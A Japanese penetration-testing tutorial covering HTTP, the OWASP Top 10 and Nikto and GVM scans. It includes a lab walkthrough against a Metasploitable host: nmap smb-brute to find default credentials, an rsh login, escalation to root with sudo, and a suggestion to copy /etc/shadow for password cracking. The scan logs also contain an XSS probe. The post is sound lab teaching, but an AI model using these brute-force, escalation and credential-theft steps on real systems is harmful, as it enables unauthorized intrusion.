導入
本記事は以下の続編として、Webアプリケーションにおける脆弱性評価と演習を扱います。
この記事で得られること
- HTTP/HTTPSの基本構造と通信の流れ
- Webアプリケーションの脆弱性とOWASP Top 10
- ハンズオンに基づく脆弱性スキャンおよび検証方法
- 独自 Web アプリラボの構築と典型的な設計ミスの理解
⚠️ 注意(必読)
本記事で扱う内容は、悪用した場合、重大な法的リスクを伴います。
許可された演習環境・検証環境でのみ実施してください。
実在組織・個人への攻撃は禁止されています。
本章について
6章ではアプリケーションベースの脆弱性の悪用を解説しますが、
内容が広範なため複数の記事に分割いたします。
以下が6章全体の構成です。
- 6.1. Webアプリケーションベースの攻撃の概要とOWASPトップ10👈本記事
- 6.2. 独自のWebアプリラボの構築方法👈本記事
- 6.3. ビジネスロジックの欠陥の理解👈本記事
- 6.4. インジェクションベースの脆弱性理解
- 6.5. 認証ベースの脆弱性悪用
- 6.6. 認可ベースの脆弱性悪用
- 6.7. クロスサイトスクリプティング(XSS)の脆弱性理解
- 6.8. クロスサイトリクエストフォージェリ(CSRF/XSRF)とサーバーサイトリクエストフォージェリ攻撃の概要
- 6.9. クリックジャッキングの概要
- 6.10. セキュリティ設定ミスの悪用
- 6.11. ファイルインクルード脆弱性の悪用
- 6.12. 安全でないコードの悪用
6.1 Webアプリケーション攻撃の概要とOWASP Top 10
● HTTP/HTTPSプロトコルの基礎
HTTPはステートレスなアプリケーションレベルプロトコルで、リクエスト/レスポンスモデルを採用しています。
- クライアント: ブラウザ、APIクライアント、カスタムHTTPプログラム
- サーバー: Webサーバー(例: Apache, Nginx)
- 特徴: 単純で理解しやすいが、ステートレスであるためセッション管理をアプリケーション側で行う必要がある
HTTPトランザクションの流れ:
1.TCP 3-way ハンドシェイク
2.HTTP GET / POST リクエスト送信
3.サーバーが HTTP レスポンス(例:200 OK)を返却
代表的なHTTPメソッド:
| メソッド | 説明 |
|---|---|
| GET | リソース取得 |
| POST | データ送信 |
| PUT | リソース更新 |
| DELETE | リソース削除 |
| OPTIONS | サーバーがサポートするメソッド一覧取得 |
| CONNECT | HTTPプロキシに対し任意ホストへのTCPトンネルを要求 |
HTTPリクエスト構造に含まれる要素:
- HTTPメソッド
- URIとリソースへのパス - 要求されたURLのパス部分
- リクエストバージョン番号 - クライアントが使用するHTTPのバージョン
- ユーザーエージェント - ユーザーが使用するブラウザなどのエージェント情報
など
URL構造の例:
https://theartofhacking.org:8123/dir/test;id=89?name=omar&x=true
- スキーム: https
- ホスト: theartofhacking.org
- ポート: 8123
- パス: /dir/test
- パスパラメータ: id=89
- クエリ文字列: name=omar&x=true
● Webセッションとセッション管理
Webセッションは、HTTPリクエストとレスポンスの一連のやり取りを通じてユーザー状態を管理します。
-
セッションIDの役割: 認証後、パスワード並みに機密性を持つ識別子
- 推奨: 128ビット以上、できれば256ビットのエントロピーを持つセッションID
-
セッション管理手段: Cookie(推奨)※、URLパラメータ(非推奨)、隠しフォームフィールド
※Cookieにも永続(Persient Cookie)と非永続(Session Cookie)の2種類存在し、Session Cookieによる管理を推奨
-
セッション管理におけるその他の推奨事項:
- TLSによる暗号化
- 既存フレームワークの利用
- セッションIDの検証・バリデーションの徹底
● OWASP Top 10
OWASP(Open Web Application Security Project)が公開するWebアプリケーションの重大な脆弱性トップ10。
最新情報: OWASP Top 10
2025年のTOP10
- Broken Access Control
- Security Misconfiguration
- Software Supply Chain Failures
- Cryptographic Failures
- Injection
- Insecure Design
- Authentication Failures
- Software or Data Integrity Failures
- Logging and Alerting Failures
- Mishandling of Exceptional Conditions
実践演習:ウェブサイトの脆弱性スキャン
NiktoというXSSなどの脆弱性を検知できるウェブスキャナーを利用して
スキャン方法と読み解き方を学習します。
Niktoの起動とテストサイトのスキャン
アプリメニューまたはコマンドラインからNiktoを起動しNmap公開テストサイトに対してスキャンを実行します。
※全件完了には時間を要すため中断してます。
Nmap公開テストサイト(scanme.nmap.org)のスクリーンショット
┌──(kali㉿Kali)-[~]
└─$ nikto -h scanme.nmap.org
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Multiple IPs found: 45.33.32.156, 2600:3c01::f03c:91ff:fe18:bb2f
+ Target IP: 45.33.32.156
+ Target Hostname: scanme.nmap.org
+ Target Port: 80
+ Start Time: 2025-11-08 12:13:25 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
^C
検出された脆弱性を一つ取り上げると、「X-Content-Type-Optionsヘッダー未設定」と確認できる。
ブラウザがMIMEタイプを誤認し悪用されるリスクがある脆弱性です。
対策としてContent-Typeを適切に設定するか、「X-Content-Type-Options: nosniff」とスニッフィングを無効化する方法があります。
複数サーバーの一括スキャン
ローカル環境の仮想ネットワーク上の複数ホストを一括でスキャンします。
複数ホストを一括スキャンする際には、対象をリスト化したテキストファイルを用意(DNS Lookupなどを活用)し'-h'オプションでNiktoに渡すことで一括スキャンが可能です。
ログが膨大であるためスクリーンショットで代用してます。
CVEの確認と詳細調査
172.17.0.2のローカルWebサーバーをスキャンしたところ、
CVE-1999-0678とCVE-2003-1418の脆弱性が確認できたためその詳細を確認する。
実行時のログはこちら(クリックで展開)
---------------------------------------------------------------------------
+ Target IP: 172.17.0.2
+ Target Hostname: 172.17.0.2
+ Target Port: 80
+ Start Time: 2025-11-08 12:26:51 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /doc/: Directory indexing found.
+ /doc/: The /doc/ directory is browsable. This may be /usr/doc. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0678
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/ChangeLog: Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpMyAdmin/: phpMyAdmin directory found.
+ /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8917 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2025-11-08 12:27:10 (GMT0) (19 seconds)
NIST NVD(https://nvd.nist.gov/) から詳細を確認すると
- CVE-1999-0678
Apache のデフォルト設定により /usr/doc が公開され、サーバー内部ドキュメントが閲覧可能となる問題 - CVE-2003-1418
ETag に含まれる inode や、multipart MIME 境界の子プロセス ID が漏洩しうる問題
であることがわかります。
参考:CVEに関するスクリーンショット
Niktoの実行結果のエクスポート
Niktoはスキャン結果を HTML / CSV / TXT 形式で出力可能です。
html と csv 形式で出力する方法をそれぞれ示します。
- html
実行時のログはこちら(クリックで展開)
┌──(kali㉿Kali)-[~]
└─$ nikto -h 172.17.0.2 -o scan_results.htm
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.17.0.2
+ Target Hostname: 172.17.0.2
+ Target Port: 80
+ Start Time: 2025-11-08 12:42:36 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /doc/: Directory indexing found.
+ /doc/: The /doc/ directory is browsable. This may be /usr/doc. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0678
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/ChangeLog: Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpMyAdmin/: phpMyAdmin directory found.
+ /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8910 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2025-11-08 12:42:54 (GMT0) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- csv
┌──(kali㉿Kali)-[~]
└─$ cat scan_results.txt
"Nikto - v2.5.0/"
"172.17.0.2","172.17.0.2","80","","","","Apache/2.2.8 (Ubuntu) DAV/2"
"172.17.0.2","172.17.0.2","80","","GET","/","Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10."
"172.17.0.2","172.17.0.2","80","https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options","GET","/","The anti-clickjacking X-Frame-Options header is not present."
"172.17.0.2","172.17.0.2","80","https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/","GET","/","The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type."
"172.17.0.2","172.17.0.2","80","","GET","/index","Uncommon header 'tcn' found, with contents: list."
"172.17.0.2","172.17.0.2","80","http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275","GET","/index","Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php."
"172.17.0.2","172.17.0.2","80","","HEAD","/","Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch."
"172.17.0.2","172.17.0.2","80","","ARPIYMWU","/","Web Server returns a valid response with junk HTTP methods which may cause false positives."
"172.17.0.2","172.17.0.2","80","https://owasp.org/www-community/attacks/Cross_Site_Tracing","TRACE","/","HTTP TRACE method is active which suggests the host is vulnerable to XST."
"172.17.0.2","172.17.0.2","80","","GET","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","/phpinfo.php: Output from the phpinfo() function was found."
"172.17.0.2","172.17.0.2","80","","GET","/doc/","Directory indexing found."
"172.17.0.2","172.17.0.2","80","CVE-1999-0678","GET","/doc/","The /doc/ directory is browsable. This may be /usr/doc."
"172.17.0.2","172.17.0.2","80","OSVDB-12184","GET","/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings."
"172.17.0.2","172.17.0.2","80","OSVDB-12184","GET","/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings."
"172.17.0.2","172.17.0.2","80","OSVDB-12184","GET","/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings."
"172.17.0.2","172.17.0.2","80","OSVDB-12184","GET","/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings."
"172.17.0.2","172.17.0.2","80","","GET","/phpMyAdmin/changelog.php","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts."
"172.17.0.2","172.17.0.2","80","CVE-2003-1418","GET","/phpMyAdmin/ChangeLog","Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008."
"172.17.0.2","172.17.0.2","80","","GET","/phpMyAdmin/ChangeLog","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts."
"172.17.0.2","172.17.0.2","80","","GET","/test/","Directory indexing found."
"172.17.0.2","172.17.0.2","80","","GET","/test/","This might be interesting."
"172.17.0.2","172.17.0.2","80","CWE-552","GET","/phpinfo.php","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information."
"172.17.0.2","172.17.0.2","80","","GET","/icons/","Directory indexing found."
"172.17.0.2","172.17.0.2","80","https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/","GET","/icons/README","Apache default file found."
"172.17.0.2","172.17.0.2","80","","GET","/phpMyAdmin/","phpMyAdmin directory found."
"172.17.0.2","172.17.0.2","80","","GET","/phpMyAdmin/Documentation.html","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts."
"172.17.0.2","172.17.0.2","80","https://typo3.org/","GET","/phpMyAdmin/README","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts."
"172.17.0.2","172.17.0.2","80","","GET","/#wp-config.php#","#wp-config.php# file found. This file contains the credentials."
実行時のログはこちら(クリックで展開)
┌──(kali㉿Kali)-[~]
└─$ nikto -h 172.17.0.2 -o scan_results.txt -Format csv
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.17.0.2
+ Target Hostname: 172.17.0.2
+ Target Port: 80
+ Start Time: 2025-11-08 12:43:12 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /doc/: Directory indexing found.
+ /doc/: The /doc/ directory is browsable. This may be /usr/doc. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0678
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/ChangeLog: Server may leak inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 1115138, size: 40540, mtime: Tue Dec 9 17:24:00 2008. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpMyAdmin/: phpMyAdmin directory found.
+ /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8910 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2025-11-08 12:43:28 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
参考:Nikto以外の脆弱性スキャナー
- 商用向け(有償)
- nvicti / Netsparker (invicti)
- Acunetix
- オープンソース
- OWASP ZAP
- w3af
- 特化ツール
- sqlmap:sqlに特化
- WPScan:WordPressに特化
実践演習:GVM脆弱性スキャナの利用
本演習では脆弱なホスト(172.17.0.2)に対して、
脆弱性スキャンを実行し、発見された脆弱性を悪用します。
GVMのスキャン実行手順については以前扱ってますのでそちらをご覧ください。
GVMでのスキャン実行
脆弱なホストに対して詳細タスクウィザードを選択し「Metaspoloitable」というタスク名を付けて実行します。
※スキャンがかなり時間を要し、30分以上かかります。
スキャン結果の確認
スキャン完了後にレポートを開きスキャン結果を確認します。
複数の脆弱性の内、「rexecサービスが実行中」という脆弱性について悪用します。
参考
対策やCVSSのスコア、脆弱性テストのスクリプトを含む脆弱性の詳細については、レポート内の脆弱性詳細のSolution や CVE の詳細ページを閲覧することで確認できます。
一つ前のスクリーンショットのSolutionの項から、rexecサービスの代わりにSSHを利用するのが対策の一つとして挙げられてます。
発見した脆弱性を悪用する。
Nmapを利用し、rexecが使用できるアカウント情報をSMBから情報が得られるかを確認します。
※SMBの脆弱性確認は省略してます。
OSのユーザー名とSMBのユーザー名を同期させることが多い点を考慮して、
Nmap NSEスクリプトのうち'smb-burte'を利用してアカウントを調査します。
┌──(kali㉿Kali)-[~]
└─$ sudo nmap -sV -p 445 -script smb-brute 172.17.0.2
Starting Nmap 7.94 ( https://nmap.org ) at 2025-11-08 13:59 UTC
Nmap scan report for metasploitable.vm (172.17.0.2)
Host is up (0.000033s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Host script results:
| smb-brute:
| msfadmin:msfadmin => Valid credentials
|_ user:user => Valid credentials
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.04 seconds
Host script resultsから2つのユーザーとパスワードが確認できます。
これらを用いてrexecサービス(rsh)を実行します。
┌──(kali㉿Kali)-[~]
└─$ rsh -l msfadmin 172.17.0.2
Last login: Sun Jul 16 21:04:01 EDT 2017 on tty1
Linux 32554753bfe5 4.13.0-21-generic #24-Ubuntu SMP Mon Dec 18 17:29:16 UTC 2017 x86_64
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ pwd
/home/msfadmin
msfadmin@metasploitable:~$ sudo su
[sudo] password for msfadmin:
root@metasploitable:/home/msfadmin#
特権ユーザへの昇格まで成功しています。
この後 /etc/passwd および /etc/shadow ファイルをコピーしJohn the Ripperユーティリティなどを用いてパスワード解析することで、次の攻撃へと連鎖すること容易に想像できると思います。
※パスワードクラックに関しては6.5章「認証ベースの脆弱性の悪用」で扱います。
6.2. 独自のWebアプリラボの構築方法
● ラボ環境の目的
- Webアプリ脆弱性を安全に理解・検証
- インジェクションや認証欠陥を実習可能
● おすすめのLinuxディストリビューション
下記を利用した環境構築が手軽でおすすめです。
Kali Linux:本記事でも利用している最も人気なディストリビューション
Parrot OS:ペンテスターや研究者に人気なディストリビューション
BlackArch Linux:1900以上のツールパッケージが付属するディストリビューション
6.3 ビジネスロジックの欠陥の理解
ビジネスロジックの欠陥とは設計上の欠陥のこと。
脆弱性スキャナでは検知ができないため独自の対策が必要です。
- 例: 課金ロジックやポイント加算の不正操作
- 対策: 入力検証と処理フローの厳格化
- OWASPが推奨する欠陥に対する攻撃テスト及び防御方法はこちら
本章のまとめ
本章ではWebアプリケーションの脆弱性を体系的に整理し、HTTP/HTTPSプロトコル理解 → OWASP Top 10 → ラボ環境での演習 → 独自のWebアプリラボの構築方法 → ビジネスロジックの欠陥の理解までを扱いました。
- セッション管理や認証処理の欠陥、入力検証の不備が攻撃成立に直結する
- OWASP Top 10を理解し、防御策を検討することがセキュリティ専門家の基本
📍 次回予告
次回は「6.4 インジェクション攻撃」以降の6章の内容を解説します。